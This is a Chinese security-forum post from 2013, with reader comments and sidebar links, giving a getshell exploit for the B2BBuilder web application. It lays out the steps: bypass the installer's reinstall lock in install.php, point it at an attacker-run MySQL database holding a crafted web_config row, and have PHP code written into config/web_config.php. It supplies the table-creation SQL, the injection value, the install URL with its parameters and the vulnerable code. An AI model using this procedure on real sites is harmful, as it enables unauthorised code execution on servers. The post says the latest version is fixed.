[我爱t00ls] B2BBuilder GetShell

2013-09-05 21:56:21 30 Yaseng 4437

来凑个热闹漏洞最新版已修复

重装绕过
系统安装时虽然install/index.php 有重装lock验证,但重装代码在 install.php 中可以直接绕过验证,又结合下面的查询config表直接写入文件可以远程getshell

getshell
第一步: 公网mysql中新建一个 web_config 表

CREATE TABLE `hy_web_config` (  `id` int(5) unsigned NOT NULL auto_increment COMMENT '主键ＩＤ',  `index` varchar(30) NOT NULL COMMENT '数组下标',  `value` text NOT NULL COMMENT '数组值',  `statu` tinyint(1) NOT NULL default '1' COMMENT '状态值，1可能，0不可用',  `type` varchar(50) default NULL,  `des` text,  PRIMARY KEY  (`id`)) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='网站配置表' AUTO_INCREMENT=849 ;

INSERT INTO  `hy_web_config` (`id` ,

`index` ,

`value` ,

`statu` ,

`type` ,

`des`)

VALUES (NULL , 'getshell', ''')); ?><?php phpinfo(); ?>', '1', NULL , NULL);

第二步 :

先在公网mysql执行语句

http://w/coder/b2b/install/install.php?action=setup&dbhost=localhost&port=3306&dbname=b2btest&dbuser=root&dbpassword=passw0rd&tableprefix=b2bbuilder_&guid=6F9619FF-8B86-D011-B42D-00C04FC964FF

访问以上地址 (修改为对应的信息)

                //写系统配置文件

                $rsid=mysql_query("select * from  ".$tableprefix."web_config");

              $arr=array(); $configs=array();

                while($row=mysql_fetch_array($rsid))

                {

                    $arr[] = $row;

                }

                foreach($arr as $v)

                {

                    $index=$v['index'];

                    $value=$v['value'];

                    $configs[$index]=$value;

                }

                

              $write_config_con_array=$configs;

                $write_config_con_str=serialize($write_config_con_array);//将数组序列化后生成字符串

                $write_config_con_str='<?php $config = array_merge($config, unserialize(\''.$write_config_con_str.'\'));?>';//生成要写的内容  写入shell 

                $cfp=fopen(dirname(__FILE__).'/../config/web_config.php','w');

通过以上代码可以getshell

演示

类别 Web安全

关于作者

Yaseng7篇文章33篇回复

评论30次

要评论？请先登录或注册

10楼

al277
2013-9-5 23:02

给力。。。

回复|@ta|踩(0)|顶(0)
9楼

President
2013-9-5 22:27

你太能说了我输了我一句你能说10句

回复|@ta|踩(0)|顶(0)
8楼

ghostz
2013-9-5 22:21

细节才是确定一件事情成败的关键！不过对于一个帖子中出现这么一点小小错误，我承认我的的确确是有点吹毛求疵了。我刚想责问一下自己，为什么呢这是？？在停眼一看，看到阁下那明晃晃的两个太阳上面顶这两个大字版主我马上心情又平静了很多~阁下乃是俺吐司的堂堂版主怎么能又这样简单的错误呢？因为大家都是吐司的兄弟，朋友，战友，或是基友，无论从什么角度出发，我都应该善意的提醒您，告诉您，帮助您，同时也要向您表明我的立场，说出我的想法。。。。。。。。。。。。。。版主真的打错字了~~

回复|@ta|踩(0)|顶(0)
7楼

飞云小哥哥
2013-9-5 22:06

yaseng基友又给力了！

回复|@ta|踩(0)|顶(0)
6楼

President
2013-9-5 22:03

不要在意细节

回复|@ta|踩(0)|顶(0)
5楼

President
2013-9-5 22:00

激动了

回复|@ta|踩(0)|顶(0)
4楼

ghostz
2013-9-5 22:00

要详细管理很强大 ^^ | | ??

回复|@ta|踩(0)|顶(0)
3楼

ty4z2008
2013-9-5 22:00

@President 错别字

回复|@ta|踩(0)|顶(0)
2楼

xiaoxiaoabc
2013-9-5 21:59

沙发，顶上。

回复|@ta|踩(0)|顶(0)
1楼

President
2013-9-5 21:58

xi望漏洞的朋友们不要转载了以最近的事情引以为戒要相信管理很强大的手里有定位法器

回复|@ta|踩(0)|顶(0)

[我爱t00ls] B2BBuilder GetShell

关于作者

评论30次

给力。。。

你太能说了我输了我一句你能说10句

yaseng基友又给力了！

不要在意细节

激动了

要详细管理很强大 ^^ | | ??

@President 错别字

沙发，顶上。

xi望漏洞的朋友们不要转载了以最近的事情引以为戒要相信管理很强大的手里有定位法器

热门文章

安全资讯致数千人伤亡的寻呼机为何能爆炸？专家：或黑客入侵致电池过载，或内部被对手安装了爆炸物

安全资讯Godzilla 无文件后门利用 Atlassian Confluence漏洞 CVE-2023-22527

安全资讯黑客入侵自行车：无线换档系统存在漏洞

渗透测试车联网攻击链路图

最新回复

不错，学习了

试过装了360基本上很难执行命令 ...

之前有泄露的裤子把里面的密码整合下就 ...

大概率中马了

用bp看下数据包

精华推荐

渗透测试Bypass ngx_lua_waf SQL注入防御（多姿势）

渗透测试CVE-2017-7269的几个技巧及BUG修正

渗透测试Spring Boot 相关漏洞利用 Check List

渗透测试记一次mssql注入

代码学习简单二开geacon_pro和cs实现内存加载frp

网络钓鱼电子邮件越来越多地使用 SVG 附件来逃避检测

苹果证实零日攻击攻击macOS系统

增强网络弹性：CISA 红队对美国关键基础设施部门组织的评估的见解

微信活码-Getshell

什么？你想要日车了？

利用websocket进行水坑攻击

[我爱t00ls] B2BBuilder GetShell

关于作者

评论30次

给力。。。

你太能说了 我输了 我一句你能说10句

yaseng基友又给力了！

不要在意细节

激动了

要详细管理很强大 ^^ | | ??

@President 错别字

沙发，顶上。

xi望漏洞的朋友们不要转载了 以最近的事情引以为戒 要相信管理很强大的 手里有定位法器

热门文章

安全资讯致数千人伤亡的寻呼机为何能爆炸？专家：或黑客入侵致电池过载，或内部被对手安装了爆炸物

安全资讯Godzilla 无文件后门利用 Atlassian Confluence漏洞 CVE-2023-22527

安全资讯黑客入侵自行车：无线换档系统存在漏洞

渗透测试车联网攻击链路图

最新回复

精华推荐

渗透测试Bypass ngx_lua_waf SQL注入防御（多姿势）

渗透测试CVE-2017-7269的几个技巧及BUG修正

渗透测试Spring Boot 相关漏洞利用 Check List

渗透测试记一次mssql注入

代码学习简单二开geacon_pro和cs实现内存加载frp

你太能说了我输了我一句你能说10句

xi望漏洞的朋友们不要转载了以最近的事情引以为戒要相信管理很强大的手里有定位法器